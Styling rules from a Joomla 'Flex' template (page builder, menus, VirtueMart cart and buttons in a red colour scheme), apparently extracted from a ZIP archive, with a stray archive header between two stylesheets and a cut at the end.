.entry-header h2:after {
  background: #f47363;
}
.html-style span {
  background: #f46a59;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #f46a59;
}
.bullets .li-circle {
  color: #f14833;
}
.dropcaps .naked-drop span {
  color: #f14833;
}
.dropcaps .full-drop span {
  background: #f14833;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #f47363;
}
.cd-pagination li.active >a {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #b21f0c;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(241,72,51,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #f14833;
}
.sppb-nav-tabs >li >a {
  color: #f14833;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #f47363;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #f47363;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #f14833;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #f14833;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #f14833;
  border-bottom-color: #f14833;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #f14833;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #f14833;
  box-shadow: inset 0 0 0 1px #f14833;
}
.sppb-nav-pills >li.active >a >i {
  color: #f14833;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #f47363;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o,
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.far.fa-star {
  color: #c0c0c0;
}
.pro-client-url {
  color: #f14833;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #f14833;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #f14833;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #f14833;
}
.light .sppb-selector span i {
  color: #fbc8c2;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.light .sppb-selector >i {
  color: #f9b3aa;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #fbc8c2;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #f47363;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #f35d4b;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #f14833;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #f14833;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #f14833;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.default >.sppb-media-body >i.fas,
.sppb-media.flex >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fas {
  color: #fbc8c2;
}
.sppb-media footer strong {
  color: #f35d4b;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #f47363;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f89e92;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #f35d4b;
  box-shadow: 0 0 5px rgba(241,72,51,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f57b6c;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #f9b3aa;
}
.acym_module_form .acysubbuttons-icon::before {
  background: #f14833;
}
.dark .acymailing_form .acysubbuttons {
  color: #f79184;
}
.dark .acymailing_form .acysubbuttons:focus {
  border: 1px solid #f6887b;
}
.dark .acym_module_form input.cell {
  color: #fbc8c2;
}
.dark .acym_module_form input.cell:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #f89e92 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #f47363 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #f89e92 !important;
}
.form-builder-checkbox-item label::before,
.form-builder-radio-item label::before,
.sppb-addon-form-builder .sppb-form-check-label::before {
  border: 2px solid #f6887b;
}
.form-builder-checkbox-item input:checked+label::before,
.form-builder-radio-item input:checked+label::before,
.sppb-addon-form-builder .sppb-form-check-input:checked+label::before {
  background: #f35d4b;
  box-shadow: inset 0 0 5px rgba(0,0,0,0.2);
}
.error-page .error-page-inner >div.container .btn-error {
  background: #f35d4b;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #f14833;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #f6887b;
}
.error-page .error-page-inner >div.container .error-code {
  color: #f47363;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #f35d4b;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #f35d4b;
}
.sp-button {
  border-color: #f6887b !important;
}
.sp-selected-button {
  background-color: #f14833 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #f14833 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #ca230e !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(241,72,51,0.8);
}
.cd-customization .add-to-cart {
  background-color: #f14833;
}
.cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #f14833;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #f57b6c;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #f14833;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #f14833;
  border-top: 1px solid rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #f6887b;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(241,72,51,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #f14833;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #f14833;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #ef331b;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #f14833;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #e2270f;
}
.cart-view .billto-shipto a.details {
  background: #f14833;
}
.cart-view .billto-shipto a.details:hover {
  background: #e2270f;
}
.cart-view table.cart-summary tr th {
  background: #f14833;
  border: solid 1px #f14833;
}
.cart-view table.cart-summary input.details-button {
  background: #f14833;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #f14833;
}
.sectiontableentry1 td a.change-payment {
  color: #f47363;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #f14833;
}
.vm-button-correct {
  background-color: #f14833;
}
.vm-button-correct:hover {
  background-color: #ef331b;
}
.vm-button {
  background-color: #f47363;
}
#com-form-login-remember input.default {
  background: #f14833;
}
#com-form-login-remember input.default:hover {
  background: #ef331b;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.control-buttons button.default {
  background: #f14833;
}
.control-buttons button.default:hover {
  background: #ef331b;
}
span.userfields_info {
  color: #f14833;
  border-bottom: 1px solid #f14833;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #f14833;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #f14833;
}
.vm-flex-search .vm-search-button >i {
  color: #f6887b;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #f14833;
}
.chzn-container-active .chzn-single {
  border: 1px solid #f14833 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #f14833;
}
.vm-menu .vm-title {
  border-top: 1px solid #f47363;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #f14833;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(241,72,51,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(241,72,51,0.85);
    stroke: #f14833;
  }
}
PK!�*�s�s�flex/css/presets/preset1.cssnu&1i�.major_color_bckg-100 {
  background-color: #f14833;
}
.major_color_bckg-90 {
  background-color: rgba(241,72,51,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(241,72,51,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(241,72,51,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(241,72,51,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(241,72,51,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(241,72,51,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(241,72,51,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(241,72,51,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(241,72,51,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #f14833 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #f47363;
}
.major_color-lighten-20 {
  color: #f89e92;
}
.major_color-lighten-30 {
  color: #fbc8c2;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #f14833;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #f14833;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #f47363;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(241,72,51,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #f14833;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(241,72,51,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #b21f0c;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #f14833;
}
.sp-module ul.accordion-menu li.current > a {
  color: #f14833;
}
.nav.menu li.current > a {
  color: #f14833;
}
.close-offcanvas:hover {
  border: 1px solid #f14833;
  color: #f14833;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
a {
  color: #f14833;
}
a:hover {
  color: #e2270f;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dt >span.fas,
.article-info >dd >i,
.article-info >dd >span.fa,
.article-info >dd >span.fas {
  color: #f47363;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #f47363;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #ef331b;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #e2270f;
}
#offcanvas-toggler >i {
  color: #f47363;
}
#offcanvas-toggler >i:hover {
  color: #f14833;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #f14833;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(241,72,51,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
